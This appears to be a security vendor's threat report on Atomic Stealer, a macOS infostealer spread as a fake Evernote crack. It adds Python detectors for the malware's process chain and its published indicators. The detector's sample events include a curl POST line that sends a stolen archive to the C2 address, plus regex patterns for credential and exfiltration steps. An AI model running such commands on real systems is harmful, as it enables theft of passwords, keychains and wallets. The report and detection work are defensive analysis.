Atomic Stealer Malware Disguised as Crack Program (macOS)


AhnLab SEcurity intelligence Center (ASEC) has discovered the Atomic Stealer malware being distributed disguised as the Evernote Crack program. Atomic Stealer is an information-stealing malware for macOS. It steals data such as browser information, system keychain, wallet, and system information. It is mainly distributed through installation files such as pkg and dmg.


When users access the site that distributes malware, a screen prompting the download of a crack installation file is displayed. The site checks the browser UserAgent of the victim’s system environment. If the UserAgent is for macOS, the user is redirected to the Atomic Stealer installation page. If the UserAgent is for Windows, the user is redirected to the LummaC2 malware installation page.

Figure 1. Malware distribution site


In the case of the macOS environment, threat actors first prompt users to execute the commands shown on the page in their terminal, before distributing the malware through the installer. The executed shell script downloads and runs Atomic Stealer. This method is likely used to bypass the Gatekeeper pop-up that appears when an externally downloaded file is executed.

Figure 2. install.sh installing malware


Additionally, when the file packaged in dmg format is executed, it prompts users to open the Installer file and click the Open button to run the malware.

Figure 3. Screen after executing the dmg file


Atomic Stealer collects system information by running the “system_profiler” command with the “SPMemoryDataType” data type, then checks the output for the “QEMU” or “VMware” string to prevent the file from running in a virtual environment.

Figure 4. Logic for checking the virtual environment


Atomic Stealer displays a warning message disguised as a legitimate program and requests the system password. When the user enters the password, the malware validates it with the “dscl . authonly” command and stores the entered password.

Figure 5. Collecting the password

Figure 6. Warning window prompting for the system password


As shown in Figure 5, Atomic Stealer executes AppleScript via OSA Script to explore and collect the files targeted for information leakage. It creates a subdirectory under the “/tmp” path and collects information from browsers, the system, Notes, keychains, Telegram, and cryptocurrency wallets. It then compresses the collected data into a file named “out.zip” using the “ditto” command. The compressed user information is sent to the threat actor’s server via a POST request using the “curl” command, after which the malware deletes itself.

Figure 7. Information being leaked to the C2 server
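The behaviour described above (the virtual-machine check, the password dialog and “dscl . authonly” validation, the “ditto” archive under /tmp and the “curl” POST) is a sequence that a defender can look for in process telemetry. The following Python is an added example, not ASEC's code: it assumes a JSON-lines feed of process-start events with the fields ts, pid, ppid, user and cmdline (a constructed stand-in for EDR or Endpoint Security telemetry), the events in SAMPLE_EVENTS are constructed, and the “osascript ... display dialog ... with hidden answer” pattern is an assumption about how the password prompt is produced. It groups command-line matches by the root of the process tree and alerts when several stages of the chain occur together within a short window, which keeps a lone benign “system_profiler” or “curl -X POST” from firing.

```python
import json
import re
from collections import defaultdict

# One regex per stage of the behaviour the report describes.
STAGES = {
    "vm_check": re.compile(r"\bsystem_profiler\b.*\bSPMemoryDataType\b"),
    # Assumption: the fake warning is an AppleScript dialog with a hidden-answer field.
    "password_prompt": re.compile(r"\bosascript\b.*display dialog.*hidden answer", re.I),
    "password_check": re.compile(r"\bdscl\s+\.\s+authonly\b"),
    "archive_tmp": re.compile(r"\bditto\b.*(/tmp/|/private/tmp/).*out\.zip"),
    "exfil_post": re.compile(r"\bcurl\b.*(-X\s*POST|--data\S*|-F\s|-d\s).*(/tmp/|/private/tmp/)"),
}

# Constructed process events: one infected session (root pid 500) and two
# unrelated admin commands that each match a single stage.
SAMPLE_EVENTS = """\
{"ts": 1700000000, "pid": 500, "ppid": 1, "user": "victim", "cmdline": "bash install.sh"}
{"ts": 1700000002, "pid": 510, "ppid": 500, "user": "victim", "cmdline": "/tmp/Installer"}
{"ts": 1700000003, "pid": 511, "ppid": 510, "user": "victim", "cmdline": "system_profiler SPMemoryDataType"}
{"ts": 1700000005, "pid": 512, "ppid": 510, "user": "victim", "cmdline": "osascript -e display dialog Password required default answer with hidden answer"}
{"ts": 1700000006, "pid": 513, "ppid": 510, "user": "victim", "cmdline": "dscl . authonly victim <password>"}
{"ts": 1700000020, "pid": 514, "ppid": 510, "user": "victim", "cmdline": "ditto -c -k --sequesterRsrc --keepParent /tmp/a1b2c3 /tmp/out.zip"}
{"ts": 1700000021, "pid": 515, "ppid": 510, "user": "victim", "cmdline": "curl -X POST -F file=@/tmp/out.zip http://192.124.178.88/contact"}
{"ts": 1700000100, "pid": 600, "ppid": 1, "user": "admin", "cmdline": "curl -X POST -d @/tmp/report.json https://intranet.example/api"}
{"ts": 1700000101, "pid": 601, "ppid": 1, "user": "admin", "cmdline": "system_profiler SPMemoryDataType"}
"""


def load_events(text):
    """Parse JSON-lines process events into dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify(cmdline):
    """Return the names of every stage whose pattern matches this command line."""
    return [name for name, rx in STAGES.items() if rx.search(cmdline)]


def root_of(pid, parents):
    """Walk ppid links up to the highest ancestor we have an event for."""
    seen = set()
    while pid in parents and parents[pid] in parents and pid not in seen:
        seen.add(pid)
        pid = parents[pid]
    return pid


def detect(events, min_stages=3, window_s=300):
    """Alert once per process tree that shows >= min_stages distinct stages within window_s."""
    parents = {e["pid"]: e["ppid"] for e in events}
    hits = defaultdict(list)  # root pid -> [(ts, stage, pid, user)]
    for e in events:
        for stage in classify(e["cmdline"]):
            hits[root_of(e["pid"], parents)].append((e["ts"], stage, e["pid"], e["user"]))

    alerts = []
    for root, rows in hits.items():
        rows.sort()
        # Slide a time window over the ordered hits; fire on the first window that qualifies.
        for i in range(len(rows)):
            window = [r for r in rows[i:] if r[0] - rows[i][0] <= window_s]
            stages = sorted({r[1] for r in window})
            if len(stages) >= min_stages:
                alerts.append({"root_pid": root, "user": window[0][3],
                               "first_ts": rows[i][0], "stages": stages,
                               "pids": sorted({r[2] for r in window})})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect(load_events(SAMPLE_EVENTS)):
        print(json.dumps(alert))
```

Run against the constructed feed, only the tree rooted at pid 500 produces an alert, listing all five stages; the admin's single “curl -X POST” and “system_profiler” invocations are classified but never reach the threshold. In production the patterns would be tuned to the telemetry source's exact command-line formatting, and “dscl . authonly” from a non-login process is worth alerting on by itself.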


As described above, Atomic Stealer is distributed disguised as a crack, or users are led to the website hosting the malware through the Google ad platform. Users must therefore be cautious about running programs downloaded from unknown sources and should obtain software from official distribution websites.

MD5

774d14a4fc61176aaefb94468b513289
bf9b98fce3c2fefdacdff234837e621b
e0030c7976f1d90fd38e4e898e9957e8

URL

http[:]//192[.]124[.]178[.]88/contact
https[:]//webzal[.]com/get/update
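The indicators above are published defanged, so they have to be normalised before they can be matched against proxy logs or file hashes. The following Python is an added example, not ASEC's code: it parses the IoC list exactly as printed in this report, refangs the URLs, and checks constructed proxy log lines and a constructed file body against them. The proxy log format (Squid-style access log) and the log lines themselves are assumptions made for the demonstration.

```python
import hashlib
import re
from urllib.parse import urlparse

# The IoC block from the report, in its defanged form.
IOC_TEXT = """\
MD5
774d14a4fc61176aaefb94468b513289
bf9b98fce3c2fefdacdff234837e621b
e0030c7976f1d90fd38e4e898e9957e8
URL
http[:]//192[.]124[.]178[.]88/contact
https[:]//webzal[.]com/get/update
"""

# Constructed Squid-style proxy log lines; one C2 POST, one benign GET, one payload fetch.
PROXY_LOG = [
    "1700000021.412 120 10.0.0.5 TCP_MISS/200 512 POST http://192.124.178.88/contact - HIER_DIRECT/192.124.178.88 text/html",
    "1700000030.001 35 10.0.0.7 TCP_MISS/200 2048 GET https://www.example.org/ - HIER_DIRECT/203.0.113.20 text/html",
    "1700000045.900 80 10.0.0.9 TCP_MISS/200 9001 GET https://webzal.com/get/update - HIER_DIRECT/203.0.113.10 application/octet-stream",
]


def refang(indicator):
    """Turn a defanged indicator back into its real form so it can be matched."""
    return (indicator.replace("[:]", ":").replace("[.]", ".")
            .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def parse_iocs(text):
    """Read the MD5 / URL sections of the report's IoC block into sets."""
    iocs = {"md5": set(), "url": set()}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.upper() in ("MD5", "URL"):
            section = line.lower()
        elif section == "md5" and re.fullmatch(r"[0-9a-fA-F]{32}", line):
            iocs["md5"].add(line.lower())
        elif section == "url":
            iocs["url"].add(refang(line))
    return iocs


def ioc_hosts(iocs):
    """Hostnames of the IoC URLs, for logs that record only the host."""
    return {urlparse(u).hostname for u in iocs["url"]}


def match_proxy_log(lines, iocs):
    """Return (line, indicator) pairs for log lines that contain an IoC URL or host."""
    hosts = ioc_hosts(iocs)
    hits = []
    for line in lines:
        matched = next((u for u in iocs["url"] if u in line), None)
        if matched is None:
            # Host match bounded by non-name characters so 'webzal.com' does not hit 'notwebzal.com.example'.
            matched = next((h for h in hosts
                            if re.search(r"(?<![\w.-])" + re.escape(h) + r"(?![\w.-])", line)), None)
        if matched is not None:
            hits.append((line, matched))
    return hits


def file_matches(data, iocs):
    """MD5 the given file contents and report whether the digest is a listed IoC."""
    digest = hashlib.md5(data).hexdigest()
    return digest, digest in iocs["md5"]


if __name__ == "__main__":
    iocs = parse_iocs(IOC_TEXT)
    for line, indicator in match_proxy_log(PROXY_LOG, iocs):
        print(f"HIT {indicator}: {line}")
    print(file_matches(b"constructed sample bytes", iocs))
```

The host-level fallback matters because many proxies and DNS logs do not record the full path, and the C2 paths here (“/contact”, “/get/update”) are generic enough that the host is the more durable indicator.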

Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.